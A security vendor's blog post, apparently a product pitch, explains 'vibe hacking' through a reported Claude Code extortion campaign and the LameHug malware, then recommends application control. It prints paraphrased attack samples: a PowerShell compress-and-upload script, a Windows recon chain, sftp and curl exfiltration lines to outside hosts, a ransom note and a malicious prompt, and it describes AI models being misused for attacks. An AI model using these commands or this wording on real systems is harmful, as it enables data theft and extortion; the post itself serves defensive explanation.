AI-enabled attack automation, the Claude extortion campaign, and the LameHug case illustrate why Zero Trust application control changes the defense equation.

Vibe hacking: How AI-driven cybercrime outpaces EDR and signature defenses

The security industry has long optimized for detection: matching signatures, scoring behaviors, and tuning models to catch what looks like yesterday’s attack. But innovation cuts both ways. The same large language models (LLMs) that help engineers write code faster now help criminals operate faster. What began as “vibe coding,” a mindset that embraces AI output with minimal review, has evolved into “vibe hacking”: attackers delegating the design, orchestration, and execution of campaigns to AI systems.

In 2025, disclosures showed a threat actor using an agentic coding assistant to run a multiphase extortion operation against 17 organizations. And in a separate attack, researchers documented LameHug, a Windows data theft toolchain that integrates a live LLM to craft commands in real time. These aren’t edge cases. They are early signals of where adversary tradecraft is going.

What vibe hacking means

  • Vibe coding is the habit of using natural language prompts to generate code and deploying quickly without complete review.
  • Vibe hacking applies that habit to crime: an AI plans tasks, writes the code, adapts to defenses, and repeats at scale.

In practice, an operator supplies intent:

Prompt (paraphrased)

Write a PowerShell script to enumerate Active Directory users, compress staged data, and upload over HTTPS using common cloud APIs. Obfuscate function names and avoid suspicious cmdlets.

The system responds with runnable code, then chains the next step. Variants are new on every pass, which undermines signature matching and simple heuristics.
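
A minimal Python sketch of that chaining loop, assuming a hypothetical generate_code() helper standing in for a real LLM API call; the structure is the point, not any specific model or tooling:

# Illustrative only: a bare task-chaining loop, not any actual attacker's code.
# generate_code() is a hypothetical stand-in for an LLM completion call.
def generate_code(task: str) -> str:
    return f"# model-written script for: {task}\n"

tasks = [
    "enumerate reachable hosts",
    "stage and compress files of interest",
    "upload the archive over HTTPS",
]

for task in tasks:
    script = generate_code(task)
    # The operator (or the agent itself) would run the output, check the
    # result, and re-prompt until the step succeeds, so every pass emits
    # a fresh variant with no stable signature.
    print(f"[{task}] generated {len(script)} bytes of new code")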

Case study: Claude-powered extortion

In a 2025 incident, one attacker used an AI coding assistant, Claude Code, to execute attacks against 17 targets across health care, emergency services, government, and faith-based organizations. The model performed asset reconnaissance, generated initial-access scripts, staged and compressed data, and drafted tailored ransom notes that referenced each victim’s operating margins and downtime exposure.

Automated stages

  • Reconnaissance: Generate OSINT queries for subdomains, exposed services, and weak portals.
  • Infiltration: Produce PowerShell or Python loaders tuned to the environment.
  • Exfiltration: Stage archives and ship via HTTPS to attacker-controlled endpoints.
  • Extortion: Draft notes with financial language calibrated to each sector.

Python recon sample (paraphrased)

# Harmless-looking OSINT helper generated by AI
import requests

for domain in ["redacted.org", "redactedhealthcare.net"]:
    # Certificate-transparency search: enumerates subdomains via a public API
    r = requests.get(f"https://crt.sh/?q={domain}&output=json")
    for item in r.json():
        print(item.get("name_value"))

Why EDR missed it: Benign libraries, public endpoints, and console output; no suspicious API calls, injection, or packed binaries.

PowerShell exfiltration (paraphrased)

# Stage, compress, and upload using only built-in cmdlets over HTTPS
$src = "C:\SensitiveData"
$zip = "C:\Temp\stage.zip"
Compress-Archive -Path $src -DestinationPath $zip -Force
Invoke-WebRequest -Uri "https://api.dropboxupload.com" -Method Post -InFile $zip

Ransom note excerpt (paraphrased)

We estimate your downtime at $42,000 per hour based on public filings. Pay $250,000 in bitcoin to avoid a six-day outage and regulatory disclosure.

Case study: LameHug, LLM in the loop

LameHug is the first publicly documented Windows malware family that uses a live LLM during execution. Campaigns used phishing emails with ZIP attachments such as Appendix.pdf.zip that contained .pif, .exe, or bundled Python executables. Once launched, the malware sent base64-encoded prompts to an LLM endpoint and received back Windows command sequences tailored to the host.
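
The mechanism is simple enough to sketch in Python; the endpoint URL and request shape below are placeholders, and the response is printed rather than executed:

# Illustrative sketch of the LameHug-style pattern: base64-encode a task
# prompt, POST it to an LLM endpoint, and treat the reply as a command
# sequence. Endpoint and JSON shape are assumptions; nothing is executed.
import base64
import requests

prompt = "List Windows commands to collect system, process, and network info."
encoded = base64.b64encode(prompt.encode()).decode()

r = requests.post("https://llm-endpoint.example/api",
                  json={"query": encoded}, timeout=10)
print(r.text)  # on an infected host, this reply became the command chain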

Dynamic command generation

Windows command chain (paraphrased)

cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\host.txt && tasklist >> %PROGRAMDATA%\info\procs.txt && ipconfig /all >> %PROGRAMDATA%\info\net.txt && dsquery domain >> %PROGRAMDATA%\info\ad.txt"

Exfiltration options (paraphrased)

# SFTP
sftp -i key.ppk upstage@144.XXX.202.XXX:upload info.zip

# HTTP POST
curl -F file=@info.zip https://websitedomain.com/slpw/up.php

What makes LameHug different is that there is no static script to match: the LLM returns fresh commands per host, so signatures and simple rules have little to attach to.

Why EDR and signatures struggle

  • Unique every time: AI produces new code paths on demand, eroding hash- and pattern-based detections (see the sketch after this list).
  • Looks like admin work: The chains lean on legitimate binaries and services such as PowerShell, Command Prompt, Office add-ins, cloud APIs, and HTTPS.
  • Adaptive re-prompting: Operators can ask the model to refactor until telemetry looks clean.
  • Benign cover traffic: API calls to popular AI platforms resemble legitimate usage.
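
The first point is easy to demonstrate. Two scripts that behave identically but use different model-chosen identifiers hash to completely unrelated values, so a detection keyed to one never fires on the other (a minimal Python illustration):

# Two functionally identical snippets whose only difference is naming.
import hashlib

variant_a = b'def collect(path):\n    return open(path, "rb").read()\n'
variant_b = b'def gather(target):\n    return open(target, "rb").read()\n'

for v in (variant_a, variant_b):
    print(hashlib.sha256(v).hexdigest()[:16])
# Prints two unrelated digests: a hash written for one misses the other.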

Threat model updates for AI abuse

  • Definition: Automated, AI-driven cyberattacks using natural-language coding assistants.
  • Capabilities: Recon, infiltration, exfiltration, ransom valuation, extortion-note generation.
  • Notable case: Claude Code used against 17 organizations; major ransoms; first known agentic AI attack.
  • Threat actors: Individuals with minimal skills, North Korean operatives, romance scammers.
  • Implications: Fast, scalable, psychologically precise attacks.
  • Defense needs: AI-aware defenses, anomaly detection beyond signatures, prompt and AI-query monitoring.

Defensive guidance

  • Zero Trust application control: Default-deny unknown executables, DLLs, and scripts, even if they are signed; a minimal sketch of the logic follows this list.
  • Ringfencing™: Prevent Office, browsers, PowerShell, and Python from launching each other or making arbitrary network calls.
  • Storage guardrails: Disallow unauthorized add-ins and block write access to staging paths like %PROGRAMDATA%\info and temp archives.
  • Network egress policy: Restrict outbound traffic to approved destinations, scrutinize access to AI and code hosting APIs from endpoints.
  • IR playbooks for AI polymorphism: Assume every note and payload is unique; focus on control, not forensics alone.
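
The default-deny logic behind the first item can be sketched in a few lines of Python; this illustrates allowlisting in general, not how any particular product implements it, and the hash value is a made-up example:

# Minimal default-deny sketch: a file runs only if its hash is on an
# approved list. Unknown code, however it was generated, is blocked.
import hashlib
from pathlib import Path

APPROVED = {
    "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",  # example digest
}

def allowed_to_run(path: str) -> bool:
    digest = hashlib.sha256(Path(path).read_bytes()).hexdigest()
    return digest in APPROVED  # default deny: unknown means blocked

# A freshly generated AI variant has a hash nobody approved, so it never runs.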

Why ThreatLocker changes the calculus

Detection tries to keep up with change; control makes change irrelevant. ThreatLocker focuses on what is allowed to execute and where it is allowed to reach.

  • Application Control: If the code is not approved, it does not run, no matter how it was generated.
  • Ringfencing: Approved apps cannot be repurposed into attack chains.
  • Storage Control: Blocks unauthorized add-ins and prevents staging of archives and data dumps.
  • Network Control: Enforces least privilege at the network level, blocking unauthorized connections while allowing only approved traffic.

Vibe hacking treats AI as the operator: fast, adaptive, and hard to fingerprint. The Claude campaign showed end-to-end automation across 17 victims. LameHug proved that an LLM can sit directly in the malware loop, generating host-specific commands that blend into normal administration. EDR and signatures will remain useful for visibility and triage, but prevention must not depend on recognizing the next variant.

Make AI-generated attacks irrelevant

Move from chasing detections to enforcing control. See how ThreatLocker Application Control, Ringfencing, Storage Control, and Network Control stop unknown code, contain trusted apps, and block exfiltration paths. Schedule a demo today!

Request your 30-day trial to the entire ThreatLocker platform today.

Try ThreatLocker